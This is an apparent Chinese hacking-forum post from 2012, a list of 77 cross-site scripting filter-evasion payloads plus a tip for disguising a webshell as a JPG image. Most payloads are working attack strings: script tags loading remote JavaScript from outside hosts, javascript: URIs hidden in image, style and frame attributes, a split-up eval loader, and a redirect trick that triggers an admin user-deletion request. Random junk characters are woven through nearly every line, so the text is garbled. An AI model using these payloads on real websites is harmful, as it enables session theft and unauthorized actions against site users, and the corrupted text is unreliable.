跨站图片shell
; Z% R7 z" f" TXSS跨站代码 <script>alert("")</script>
: ]: E# B/ V! i" O9 q: d, o# z' p
" v( n- d1 @) C; _4 O+ l将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
+ V+ d! \! k# u2 Y4 C5 P3 W9 k0 z# Z" j% [$ h- B; M
% Z' C; r: K! \; U1 `$ Z
# l1 X2 ]- r3 ^. j+ [: x/ ^1)普通的XSS JavaScript注入
6 u' t$ I: O b# d<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 D1 k" |. i6 h$ \
1 z3 n) @% Q. X8 |/ b(2)IMG标签XSS使用JavaScript命令% H% I8 N( |+ `1 G& q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' }* q8 @( K8 E" y
, G1 d0 d( ^! M+ I# |' A
(3)IMG标签无分号无引号
% I4 r" F' `# [<IMG SRC=javascript:alert(‘XSS’)>9 h" p4 ~% U& P6 w# l3 C
6 [- l; V, f* T: X6 I3 \$ k$ o(4)IMG标签大小写不敏感
! y5 g1 G0 u/ l. }<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, i4 g1 E' b6 U8 i% A/ j0 E% T
( d' ^* u: Q; F, Q' N(5)HTML编码(必须有分号)+ T9 p1 K _+ W+ b
<IMG SRC=javascript:alert(“XSS”)>( W/ G( _6 d6 B: d7 }9 R$ F
/ S1 f- |5 @8 _/ j(6)修正缺陷IMG标签
! B5 q- i8 p/ g! R<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>9 k: e) r3 D1 d
4 j' R" {3 c: L6 X, ~! R
(7)formCharCode标签(计算器)( I, H6 [8 q2 g5 Y9 M
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 d* ?/ f! O- {- ?
/ a2 _2 c0 i9 V, n(8)UTF-8的Unicode编码(计算器)
! ^6 `1 _/ ?7 M0 }2 @, e: u<IMG SRC=jav..省略..S')>
# d3 [& j' G3 @$ k3 x1 W
% X, T- P9 D* v9 U' {) e(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
+ V9 L% D8 F2 b* T+ L<IMG SRC=jav..省略..S')>
% }* D4 e; g6 E7 Z1 W4 ? G% ?7 u) {5 X: {
(10)十六进制编码也是没有分号(计算器)
& T7 v" b2 m- H3 }( P" U& c" }<IMG SRC=java..省略..XSS')>
5 _8 K" u5 L+ A- f
i9 m$ B( D+ q+ r* C(11)嵌入式标签,将Javascript分开
! b, X1 y7 v# e<IMG SRC=”jav ascript:alert(‘XSS’);”># b; l \1 | }! J
( S& i( L' \# i: C$ @
(12)嵌入式编码标签,将Javascript分开
( V! y) a9 N" p9 p; }; r) J% U( j8 p<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 U) C" ~ j* p( i4 R! Z d) d. c7 P) O) b4 |* e: v9 {
(13)嵌入式换行符. G2 n. u2 D8 {# M. x A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 u/ N; N9 y1 X3 u8 F
: B4 J: g( D3 V( D [) j- s(14)嵌入式回车- _ `! ~: t% m' v' T: C
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 z6 F- A) a" K6 q' j) z7 H7 a+ K
7 e( d, V- ]( P, ?# ](15)嵌入式多行注入JavaScript,这是XSS极端的例子8 ~1 h( ~; m8 N( Y/ T8 }
<IMG SRC=”javascript:alert(‘XSS‘)”>
$ ^, f, C' B, O. |8 W+ B+ `1 O
2 u0 Y. a; @4 _5 b(16)解决限制字符(要求同页面)' ?2 F2 ?7 V' v! P! t6 P/ }2 i
<script>z=’document.’</script> c3 p& N; d3 j, W
<script>z=z+’write(“‘</script>
5 G5 l8 a. L# M0 A7 b<script>z=z+’<script’</script>
+ a& f K( [# r7 m: t' n<script>z=z+’ src=ht’</script>
& j8 }6 l3 A$ C* P9 I% g% m! d! [<script>z=z+’tp://ww’</script>
5 R0 _' K8 o4 m0 Q' R* l<script>z=z+’w.shell’</script>% _2 X) t. f- b8 `$ ]& ]
<script>z=z+’.net/1.’</script>: C' x4 ?, y! k' Z
<script>z=z+’js></sc’</script>
0 \5 g9 ?, M) q9 V7 }* Q5 @<script>z=z+’ript>”)’</script>
$ b' J' ?# R( x5 k8 `* U" L# W( n<script>eval_r(z)</script>
- v& m! i. u2 U- q* |0 a7 t/ Y4 d+ [$ d% ?9 g
(17)空字符
* @$ N8 q2 ~" Y; H+ y# o, m2 xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& N( R' J, O3 w# C! A9 T
& a u$ n V: e
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
9 L8 a! m7 A* b6 Z- Hperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out" |/ @( g8 D% A H: @
/ p2 Y* _" h A7 [(19)Spaces和meta前的IMG标签$ t7 J5 V) q b' G) o
<IMG SRC=” javascript:alert(‘XSS’);”>8 @( e# M; `& L& G# S* H
* t: P+ ~" x3 z; w! E& ^(20)Non-alpha-non-digit XSS. e; ?8 S2 M9 Q2 r) `" S
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 v7 ]. k* a; L& X/ f, g, j: n( u2 ?
(21)Non-alpha-non-digit XSS to 21 i; e; l0 d& @6 ]; h- u9 g
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( D0 C) G) F& k+ |
% u8 ~, O+ A7 a4 x: |
(22)Non-alpha-non-digit XSS to 3
: P ?: ?! \1 T- ]8 e, @1 P; j0 J% Z<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 _/ p! P- x2 a6 K B$ T
+ g7 C" Q \8 A& {4 }8 f; L' p! C(23)双开括号
% _, G2 t7 S5 D" N+ Y<<SCRIPT>alert(“XSS”);//<</SCRIPT># J6 R' H! ^0 ?1 K
( H: \5 Q3 a1 I4 P0 k6 Z
(24)无结束脚本标记(仅火狐等浏览器)
k9 q' x( C: b( O2 B<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: m. l& }' l5 ~( _ l3 ^. l
# w L* J& l8 N2 c: w) q
(25)无结束脚本标记2
7 N5 Q) j$ G7 w<SCRIPT SRC=//3w.org/XSS/xss.js>
& ~; T. a7 y; ?. Z$ M2 F( n7 F
% g7 N( C3 o, T2 d6 d0 V& t(26)半开的HTML/JavaScript XSS7 M# K1 e. \, k6 H# J
<IMG SRC=”javascript:alert(‘XSS’)”
$ Y2 s6 I4 H. B
8 @3 s$ z7 D7 C9 Y(27)双开角括号9 M+ l |( D7 V, O
<iframe src=http://3w.org/XSS.html <
% G1 E$ q* n* ^: L) K8 {- H
* Z2 J, g- Y6 V0 ^; B(28)无单引号 双引号 分号% \6 D/ ~0 j) L v
<SCRIPT>a=/XSS/! {( [ X$ j. H$ j9 w
alert(a.source)</SCRIPT>& {1 |0 T. s. w" j! Y# D4 b
' w- y5 Q8 w+ N- q2 f: F: a
(29)换码过滤的JavaScript
0 Z# \0 Z2 i8 o; M% K, ~+ M\”;alert(‘XSS’);//* E" U% U1 m" j9 z3 x
' I+ ~ s5 Y, v! u2 P) \
(30)结束Title标签
2 m& p8 ?2 q. o3 o9 K* i</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: }3 W6 [; m: I* v! T6 `- C' Y: C3 Q# k: J2 y2 n
(31)Input Image
! I8 |( F3 D( \; I) k$ }5 r<INPUT SRC=”javascript:alert(‘XSS’);”>1 {2 }: q5 Q- D& s2 l- N
: L6 @3 {5 A; J4 A' c(32)BODY Image( I: x/ h: [+ X& }: v
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. u* i' W0 H4 S& w; T& P$ e
5 x& Q. o/ ^7 Z+ g2 J(33)BODY标签5 D6 C9 T( s7 ^- c
<BODY(‘XSS’)>
4 X/ }1 e8 P. I+ S2 Z4 f' f# P$ O# a0 u' c* a# Y! a
(34)IMG Dynsrc1 a4 Q& }: ?0 Z) V9 ^! X7 h; x
<IMG DYNSRC=”javascript:alert(‘XSS’)”>7 d- i% D9 M/ u7 `+ Z, f0 o: r% X
, O( G; M: V* h(35)IMG Lowsrc
( }# x5 U- g4 x& e. v% C<IMG LOWSRC=”javascript:alert(‘XSS’)”>) t% Z! Q3 J% B
# ^6 n r% ?( |9 D5 r6 _# N(36)BGSOUND
; h; G( S5 k! }- }8 X) ?<BGSOUND SRC=”javascript:alert(‘XSS’);”>5 u6 e) t6 m( v& p* X( C6 Y" ?4 @
$ v: q4 t% H- t& V+ N8 J
(37)STYLE sheet
* c r9 p, |7 [<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
: |/ C- H/ a$ g! a4 y- b$ O& a" ]* e3 r$ h1 L
(38)远程样式表0 k( ~, ]! V. S# F
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ ~) n: |: d; y( V6 x- l; _* R9 W/ i9 |5 h8 ` y+ y
(39)List-style-image(列表式)
3 ]: A2 r$ ]& d3 `0 y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 d5 j, `2 _* \) e) H% F
5 Y5 Y0 i, u6 ](40)IMG VBscript- Q0 ]. P; G+ R( N8 c
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 o; y( M$ M- I2 r7 y1 X4 B; l! T- U" Q
(41)META链接url
/ d% P) U0 M9 \<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>/ O# ~7 d8 n9 {$ P+ Y* S' v
4 U1 X7 q% ?, ~ ~9 R* u% S(42)Iframe7 w7 S3 k) V' Y) ^4 @3 z* E
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>) e5 f5 N% n ~ \* ?
(43)Frame
7 E) v% M7 G8 e+ _! w# L4 T<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. G5 @" {) `# d7 ~/ Y; `" J3 s( p; X* J& j* R }
(44)Table7 u1 X& V R, G5 l4 J7 `9 n
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 G4 J6 y; @3 }3 g
8 C; f0 o f& C+ U U(45)TD+ W; H6 P6 e) O6 Q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>7 z* x, d- x. C& @/ ~. N
U3 a9 k# Q3 J% E7 |2 w
(46)DIV background-image# J5 d" {$ V: _5 Y$ a" O5 c
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% L' Y( ^% ?3 b. H [+ f
8 ^+ b' _1 O3 W+ L7 Y( F(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279); G7 w; l& z J- M
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>) m# J r8 N4 z! K7 d$ q! X( H
7 l2 O( v$ r/ M+ D8 t5 ]2 J
(48)DIV expression$ i2 X3 `' _) Y# R: M$ R' @
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>, D' w3 _) l7 D8 t8 W. K
% ^; |6 {1 Y. E(49)STYLE属性分拆表达
7 q O! A* ^( H% H<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 }* S; U* ^7 `
4 m& h( G: H Q& j& f
(50)匿名STYLE(组成:开角号和一个字母开头)
* _! B) [7 y% Q- U8 l<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>6 |, Y& s& z9 A w
: B/ @; K2 H( E, C( h8 ~
(51)STYLE background-image
1 _% t* h' j. q' y! Q<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>! J# }4 M' W" L. {- o) R
) U |" O2 L/ p/ }4 s; p K
(52)IMG STYLE方式
1 j7 s& B- G- U0 |3 Q: R4 \exppression(alert(“XSS”))’>; A7 u F- n# x2 O8 a U9 {2 a' A- \) Z
: H, g# n# p+ o2 k5 V6 e
(53)STYLE background
! Q u; y1 B! v0 T% C- v# z( K<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% C) M% P" K+ \& W1 ?3 G4 T' e) ~
8 b% I; D" x1 C0 v; l( u(54)BASE
; J( o# Q Q7 A! ]<BASE HREF=”javascript:alert(‘XSS’);//”>
m' F' w2 a+ q* F- H' ?5 b6 w) z) {) p, d
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 T- g# j# X% A* S# M2 M
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
& z# x: R0 ]* n* [ e6 [! M/ @# E' z
(56)在flash中使用ActionScrpt可以混进你XSS的代码' s. X$ H0 P: y" X5 ]9 Y. K
a=”get”;
F+ n5 @2 X9 ~1 X7 d( i; `b=”URL(\”";' {2 T0 [+ p# z' J: z
c=”javascript:”;% R" p& C* ?# d% b# \$ h
d=”alert(‘XSS’);\”)”;( A# p9 U% l, q; J0 d
eval_r(a+b+c+d);: i0 Z6 J# y6 I5 [8 B% i
+ R, G% e; M0 h; ^
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- ?9 Z! n$ k1 I3 T+ l
<HTML xmlns:xss>; M9 E; R5 v W' C8 S% u
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>% i- D o" F. n: ]
<xss:xss>XSS</xss:xss>8 u% q6 ?4 t9 L
</HTML>3 ]" |3 e' U3 P E0 W7 U
$ f5 Y- u0 n: ~4 C; ]
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用- u" @1 r4 X6 z0 P( d* ], s
<SCRIPT SRC=””></SCRIPT>& B# ]* ]- Y+ W |; J
# X% u5 X8 k& [
(59)IMG嵌入式命令,可执行任意命令
* Q1 g, s5 L5 y! H' T% I _<IMG SRC=”http://www.XXX.com/a.php?a=b”>
! N0 V. t. f8 F4 F; z: ~/ J& k( G& `& y
(60)IMG嵌入式命令(a.jpg在同服务器)9 Q1 \9 I- b0 B8 B8 r2 R0 [$ z) B
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser+ A3 d1 h; d1 F! V* t/ |- h
8 D; f1 t3 ]% |) D& P! _
(61)绕符号过滤
: g* c8 O9 D3 f6 O2 \<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># q0 h: d+ M( r% c0 {
& m1 D; @. |* a/ G8 I# g, b(62)
8 v( [% ~1 z& y. o; g<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
B7 f6 q9 I8 N$ ?+ v2 S% L* W( e: k9 e
(63)" N }. R/ Z1 e/ o ?
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>' d$ A t2 j A; ]
) c8 X9 i0 K( Y. D) i
(64) E3 C6 c+ g8 |7 b5 T* z! \/ \" a
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
3 m' f' Q3 ~$ x( b% C8 p6 d
7 \1 d1 ^0 G# Y/ s& F5 h$ R2 @(65)
* e! V$ F1 ]+ V, f; l% l$ ?<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 `) d$ Q( g- h# K" a, F p$ H, h; a- B, w% \- t
(66)
; X/ ]( k: J" P$ v, M! _<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 R% H3 b* M: I5 B, z7 H% D6 S; N2 J( W0 u5 H- l
(67)
! p D3 V/ T6 J* R; l8 O<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
3 a* V# k ]2 ]5 s. ?' R; R: L- ^2 U+ |! H, S; F# T( v
(68)URL绕行4 W7 C8 d, i# o; s& F6 N; w6 t
<A HREF=”http://127.0.0.1/”>XSS</A> A, ~% D* I% ?
5 g6 n Z7 Y/ ?3 m2 v( r4 U(69)URL编码
4 D/ O* g" i f' ~* h: b<A HREF=”http://3w.org”>XSS</A># r' z. H+ G8 ~. a5 m0 B) |
1 c0 H" `3 y: x- ], O0 J6 O0 n(70)IP十进制9 X; K& @- j3 D8 }& ~' }
<A HREF=”http://3232235521″>XSS</A>% j( a& k3 B; q t; s: g" \
& r, ~0 i5 x" Y% e
(71)IP十六进制
3 J. n) |/ k3 i$ u. O<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># O+ U( A8 @! _
" o9 _3 U. R2 c2 k" N3 q3 K(72)IP八进制7 d& U+ I4 |* S
<A HREF=”http://0300.0250.0000.0001″>XSS</A>% V2 D3 `2 C: E6 r- w+ _ ~5 v% P
6 D3 Z) V1 H4 B! |- P5 \
(73)混合编码. z; r6 u: c9 N) ^7 O+ b
<A HREF=”h8 R) F# _) K; D& j% z
tt p://6 6.000146.0×7.147/”">XSS</A>
# ?2 Z! a3 h v: [7 U' M
* f p3 S( d! g h% p$ T(74)节省[http:]
2 O4 @/ W6 e! \* b- v; q<A HREF=”//www.google.com/”>XSS</A>
! r5 d9 u1 E2 ?/ ~7 V: m8 c7 F# z2 ^. A" |3 [) a
(75)节省[www]
# r {. C; O, v. w; p; y<A HREF=”http://google.com/”>XSS</A>
% E( O+ k" L6 M2 `& C% a
4 E9 y3 j e/ A(76)绝对点绝对DNS( j E4 I+ U3 V1 m
<A HREF=”http://www.google.com./”>XSS</A>/ X. @7 y" ` t L+ B0 b6 q# Y3 t! m
3 V) W" b' x/ ^(77)javascript链接
& D3 e9 T/ K( t) k" f5 m) G/ J<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>: }) o/ n, {- `- u' h
|
发表于 2012-9-13 17:04:56
收藏
支持
反对